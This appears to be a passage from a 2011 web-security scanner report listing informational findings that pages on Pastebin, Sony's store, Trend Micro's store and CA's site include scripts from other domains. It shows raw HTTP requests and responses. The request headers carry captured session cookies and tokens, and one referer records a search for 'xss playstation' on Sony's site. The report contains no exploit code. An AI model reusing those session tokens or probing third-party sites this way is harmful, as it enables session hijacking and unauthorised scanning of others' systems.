Accept-Ranges: bytes
Content-Length: 705
Content-Type: application/x-javascript
Date: Tue, 06 Sep 2011 18:16:27 GMT
Connection: close

/*http://core.trac.wordpress.org/changeset/6482*/
if(typeof addLoadEvent !== 'function'){addLoadEvent=(function(){var e=[],t,s,n,i,o,d=document,w=window,r='readyState',c='onreadystatechange',x=functi
...[SNIP]...
1;clearInterval(t);while(i=e.shift())i();if(s)s[c]=''};return function(f){if(n)return f();if(!e[0]){d.addEventListener&&d.addEventListener("DOMContentLoaded",x,false);/*@cc_on@*//*@if(@_win32)d.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

13.8. http://pastebin.com/bq8xJPMn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /bq8xJPMn

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bq8xJPMn HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php#pq=gttp%3A%2F%2Fwww.rankmyhack.com%2Fincludes%2Findexheader.php&hl=en&cp=1&gs_id=3&xhr=t&q=http://www.rankmyhack.com/includes/indexheader.php&pf=p&sclient=psy&source=hp&pbx=1&oq=http://www.rankmyhack.com/includes/indexheader.php&aq=f&aqi=&aql=&gs_sm=&gs_upl=&bav=on.2,or.r_gc.r_pw.&fp=b7e6040383bebbf&biw=1266&bih=909
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Set-Cookie: cookie_key=2; expires=Tue, 04-Oct-2011 18:10:35 GMT; path=/; domain=.pastebin.com
Vary: Accept-Encoding
Content-Length: 373099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Con
...[SNIP]...
<link href="/i/style.css?12" rel="stylesheet" type="text/css" />
                       <script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...
</script>
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- End comScore Tag -->
       <script type="text/javascript" src="http://lolbin.net/stats.php"></script>
...[SNIP]...

13.9. http://pastebin.com/etc/ads/iframes/160x600.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/160x600.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /etc/ads/iframes/160x600.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Last-Modified: Sat, 02 Jul 2011 13:17:48 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 650


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-eq
...[SNIP]...
</script>
           <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...

13.10. http://pastebin.com/etc/ads/iframes/728x90.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/ads/iframes/728x90.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /etc/ads/iframes/728x90.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Last-Modified: Sat, 02 Jul 2011 13:17:34 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 658

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-equi
...[SNIP]...
</script>
           <script type="text/javascript" src="http://tags.expo9.exponential.com/tags/Pastebincom/ROS/tags.js"></script>
...[SNIP]...

13.11. http://pastebin.com/etc/social/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pastebin.com
Path:   /etc/social/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /etc/social/index.html HTTP/1.1
Host: pastebin.com
Proxy-Connection: keep-alive
Referer: http://pastebin.com/bq8xJPMn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cookie_key=1

Response

HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Tue, 06 Sep 2011 18:10:35 GMT
Content-Type: text/html
Last-Modified: Mon, 05 Sep 2011 09:11:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Content-Length: 923


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>

       <meta http-eq
...[SNIP]...
</title>
           <script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
           <script src="http://connect.facebook.net/en_US/all.js#appId=150549571626327&amp;xfbml=1"></script>
...[SNIP]...

13.12. http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/CategoryDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=16167 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://www.sony.com/SonySearch/Search?action=search&ti=0&pst=&pti=&first=1&st=xss+playstation
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551; ensUID=249118483jocCbfxsy2s; sifrFetch=true; s_visit=1; s_sq=%5B%5BB%5D%5D; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.1.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; mbox=check#true#1315352981|session#1315352920400-736912#1315354781|PC#1315334914578-928682.19#1316562527; s_cc=true

Response

HTTP/1.1 200 OK
ntCoent-Length: 4923
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 4923
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:49:35 GMT
Connection: close
Cache-Control: private
Pragma: no-cache


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-Com
...[SNIP]...
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

13.13. http://store.sony.com/webapp/wcs/stores/servlet/SearchCatalog  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/SearchCatalog

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/SearchCatalog?storeId=10151&langId=-1&catalogId=10551&in_dim_search=&keyword=dvd+cd&x=0&y=0 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
Referer: http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; sifrFetch=true; JSESSIONID=0000-iB7fM5Tlv4F_X_Hzj5a05_:14aelsmcl; s_channel=%5B%5B%27Other%27%2C%271315352981909%27%5D%2C%5B%27Sony.com%27%2C%271315352999758%27%5D%5D; _ensChanVal=Sony.com|1315352999758; c_m=undefinedwww.sony.comwww.sony.com; mbox=session#1315352920400-736912#1315354869|PC#1315334914578-928682.19#1316562609|check#true#1315353069; ensRefId=http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay?catalogId=10551&storeId=10151&langId=-1&categoryId=27898; ensUID=249118483jocCbfxsy2s; s_cc=true; __utma=171551074.654425757.1315352924.1315352924.1315352924.1; __utmb=171551074.4.10.1315352924; __utmc=171551074; __utmz=171551074.1315352924.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); WC_SESSION_ESTABLISHED=true; WC_PERSISTENT=30cc9Vvxqa6wQXKxm9IK6%2b5q3UA%3d%0a%3b2011%2d09%2d06+14%3a50%3a04%2e135%5f1315334975092%2d379806%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2clUuR4QTxf%2f5YInkNp5DLwEIROKszrQDAawe%2bFWWFEzIDxeUPIdTDYWkA5rkgPjRPmhzB%2bzw9Hf%2fk%0avAS8zE7kY2MFDR47%2bjrT%2feKhy5Vt%2fbmyZW1xdwGzL47LAIe6LPqhTSHgSmDSMg08YS1X10MAnA%3d%3d; WC_GENERIC_ACTIVITYDATA=[1251466011%3atrue%3afalse%3a0%3aYVz6KpFhKSHbYH9BUDYIQv3N0r4%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10551%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10504%2610504%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; TS5bbf46=86861eed5e5f703c738ac8ed0955e019238741ed7a8234554e666b3fdb233202e0e51d0c222f7b4e21a038ea; fsr.s={"v":1,"rid":"1315352924764_554711","cp":{"cybershot":"N","innovation":"N","experts":"N"},"c":"http://store.sony.com/webapp/wcs/stores/servlet/CategoryDisplay","pv":4,"lc":{"d0":{"v":4,"s":true}},"cd":0,"sd":0}; 71737897-VID=5110247826455; 71737897-SKEY=4068440463389764470; HumanClickSiteContainerID_71737897=STANDALONE; s_visit=1; s_sq=sonysonystyle2007prod%3D%2526pid%253Dcontent%25253AS_Blu-Ray_Disc_Player%2526pidt%253D1%2526oid%253Dhttp%25253A//store.sony.com/wcsstore/SonyStyleStorefrontAssetStore/img/global/search_submit_arrow.gif%2526ot%253DIMAGE%26sonystyle2011dev%3D%2526pid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%25253D-1%252526categoryId%25253D16192%252526SR%25253Dnav%25253Aelectronics%25253Atv_hm_ent%25253Abluray%25253Ashop_compare%25253Ass%252523%25252Fbluray%2526oid%253Dhttp%25253A%25252F%25252Fstore.sony.com%25252Fwebapp%25252Fwcs%25252Fstores%25252Fservlet%25252FCategoryDisplay%25253FcatalogId%25253D10551%252526storeId%25253D10151%252526langId%2526ot%253DA

Response

HTTP/1.1 200 OK
ntCoent-Length: 114876
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Date: Tue, 06 Sep 2011 18:50:12 GMT
Content-Length: 114876
Connection: close
Vary: Accept-Encoding
Cache-Control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

13.14. http://store.sony.com/webapp/wcs/stores/servlet/StoreCatalogDisplay  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://store.sony.com
Path:   /webapp/wcs/stores/servlet/StoreCatalogDisplay

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /webapp/wcs/stores/servlet/StoreCatalogDisplay?langId=-1&storeId=10151&catalogId=10551 HTTP/1.1
Host: store.sony.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sony_cc=US; pref_07_20_2006=flash; lastLifestyleIndex=7; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733357F05161770-400001A440677BE1[CE]; ABC123=PxPoWN/jxgr+yTpJJZljY957NC3b7GIOlT0BMCwXPz5UAeOE8H1RTsBKnuR348WJQkXhpi8OhsKun1A=; TS5bbf46=959617bd472776e6829f43567043c6625f8782db79e380b64e666affd5df5daf336f8e10

Response

HTTP/1.1 200 OK
Cteonnt-Length: 75919
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 75919
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 18:48:32 GMT
Connection: close
Cache-Control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=8" />
<!-- AllSitesHeadInclude -->
<script type="text/javascript" src="//nexus2.ensighten.com/sony/Bootstrap.js">
</script>
...[SNIP]...

13.15. https://store.trendmicro.com/DRHM/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /DRHM/store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /DRHM/store?Action=DisplayCheckoutPaymentPage&SiteID=tmamer&Locale=en_US HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
Referer: https://store.trendmicro.com/store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.3.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fsr.s={"v":1,"rid":"1315350793273_559343","pv":3,"to":5,"c":"http://us.trendmicro.com/us/home/","lc":{"d1":{"v":3,"s":true}},"cd":1,"sd":1,"f":1315350984143}; __qca=P0-1869591235-1315350993064; bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2F%22%2C%22r%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Ftrend-micro-researchers-identify-vulnerability-in-hotmail%2F%22%2C%22t%22%3A1315351267113%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fblog.trendmicro.com%2Fcategory%2Fpharming%2F%22%2C%22l%22%3A%22Pharming%22%2C%22de%22%3A%7B%22su%22%3A%22Malware%20blog%20by%20TrendLabs%20provides%20internet%20security%20research%20information%20on%20worms%20viruses%20trojans%20adware%20and%20other%20internet%20threats%20and%20discusses%20how%20to%20protect%20your%20computer%20data%20from%20being%20hijacked%22%2C%22ti%22%3A%22Malware%20Blog%20%7C%20TrendLabs%20-%20by%20Trend%20Micro%22%2C%22nw%22%3A1544%2C%22nl%22%3A162%7D%7D

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=24051346139,0)
Date: Tue, 06 Sep 2011 18:21:15 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 56184


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_CheckoutPaymentAnonymousPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
</style>

<script src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/js/jquery.maskedinput-1.1.4.pack.js" type="text/javascript"></script>
...[SNIP]...
<div id="dr_verisign" title="This site chose VeriSign SSL for secure e-commerce and confidential communications.">
           <script src=https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en></script>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

13.16. https://store.trendmicro.com/store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.trendmicro.com
Path:   /store

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store?Action=DisplayPage&Locale=en_US&SiteID=tmamer&id=ShoppingCartPage HTTP/1.1
Host: store.trendmicro.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ORA_WX_SESSION="10.2.2.129:260-0#0"; JSESSIONID=74CA66C6686E81F96F871B79152A151D; VISITOR_ID=971D4E8DFAED43672BD9EDEF2E7090049E8F29A9B6FF10E6; BIGipServerp-drh-dc2pod9-pool1-active=2164392458.260.0000; __utma=44797537.706404181.1315350790.1315350790.1315350790.1; __utmb=44797537.2.10.1315350790; __utmc=44797537; __utmz=44797537.1315350790.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bn_u=6923713914570485926; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2Fhome-user%2F%22%2C%22r%22%3A%22http%3A%2F%2Fus.trendmicro.com%2Fus%2Fhome%2F%22%2C%22t%22%3A1315350861448%2C%22u%22%3A%226923713914570485926%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22collection%5C%22%3A%5C%22Website%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fwww.trendsecure.com%2Fcommonapi%2Fredirect.php%3Fl%3Den-US%26a%3DMT-EN%22%2C%22l%22%3A%22My%20Account%20Log-In%5Cn%22%2C%22de%22%3A%7B%22su%22%3A%22Free%20online%20virus%20scan%20and%20antivirus%20trial%20downloads.%20Get%20it%20only%20from%20TrendMicro.com!%22%2C%22ti%22%3A%22Home%20%26%20Home%20Office%20%7C%20Internet%20Security%20Software%22%2C%22nw%22%3A253%2C%22nl%22%3A225%7D%7D; fsr.s={"v":1,"rid":"1315350793273_559343","pv":2,"to":3.5,"c":"http://us.trendmicro.com/us/home/home-user/","lc":{"d1":{"v":2,"s":true}},"cd":1,"sd":1,"f":1315350865822}

Response

HTTP/1.1 200 OK
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Type: text/html;charset=UTF-8
Cache-Control: max-age=0
Connection: Keep-Alive
Keep-Alive: timeout=45, max=999
Server: Oracle Application Server/10g (10.1.2) Apache OracleAS-Web-Cache-10g/10.1.2.0.2 (TN;ecid=101360405795,0)
Date: Tue, 06 Sep 2011 18:15:31 GMT
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP TAIa OUR IND UNI PUR COM NAV CNT STA PRE"
X-Server-Name: gcweb01@dc2app96
Content-Length: 95454


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head>
<!--!esi:include src="/esi?Sit
...[SNIP]...
<!-- begin site specific javascript -->


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/eddy/cm/multimedia/commonFunctions.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_globalTrial.js"></script>


<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/OT_files/tmamer_ShoppingCartPage_contentBody.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/jqCookie.js"></script>
<script type="text/javascript" src="//drh.img.digitalriver.com/DRHM/Storefront/Site/tmamer/cm/multimedia/browser_os_detect.js"></script>
...[SNIP]...
<!-- Begin Hiconversion Head Enabling. Do NOT move. Must come directly before the closing head tag -->
               <script id='hiconversion_head_include' type='text/javascript' src='https://www.hiconversion.com/enabling/update.jsp?external=&version=1.0'></script>
...[SNIP]...
<div id="dr_verisign">
   <script src="https://seal.verisign.com/getseal?host_name=store.trendmicro.com&size=M&use_flash=YES&use_transparent=YES&lang=en"></script>
...[SNIP]...
</script>


<script language="javascript1.2" src="//libs.coremetrics.com/eluminate.js" type="text/javascript">
</script>
...[SNIP]...
<!-- ####################################### -->


<script src="https://display.digitalriver.com/?aid=244&tax=trend_micro" type="text/javascript" defer="defer"></script>
...[SNIP]...

13.17. https://www.ca.com/us/register/createprofile.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.ca.com
Path:   /us/register/createprofile.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /us/register/createprofile.aspx?returnURL=/us/default.aspx HTTP/1.1
Host: www.ca.com
Connection: keep-alive
Referer: http://www.ca.com/us/default.aspx
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lu35kz45ihmhlw45uko5w4y3; __utmz=119010075.1315351389.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=119010075.704641068069632400.1315351389.1315351389.1315351389.1; __utmc=119010075; __utmb=119010075.1.10.1315351389; bn_u=6923713924586392201; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.ca.com%2Fus%2Fdefault.aspx%22%2C%22r%22%3A%22%22%2C%22t%22%3A1315351414659%2C%22u%22%3A%226923713924586392201%22%2C%22at%22%3A%7B%22docAttrs%22%3A%22%7B%5C%22Locale%5C%22%3A%5C%22en%5C%22%2C%5C%22Product%5C%22%3Anull%2C%5C%22Description%5C%22%3A%5C%22CA%20Technologies%20offers%20it%20management%20software%20and%20solutions%20for%20all%20of%20your%20business%20needs.%5C%22%7D%22%7D%2C%22dd%22%3A%22http%3A%2F%2Fcainternetsecurity.net%2FSupport%2FDefault.aspx%3Flang%3Den-US%22%2C%22l%22%3A%22Home%20and%20Home%20Office%22%2C%22de%22%3A%7B%22ti%22%3A%22CA%20Technologies%20IT%20Management%20Software%20and%20Solutions%22%2C%22nw%22%3A252%2C%22nl%22%3A136%7D%7D; WT_FPC=id=50.23.123.106-69753008.30174402:lv=1315351461237:ss=1315351389192

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
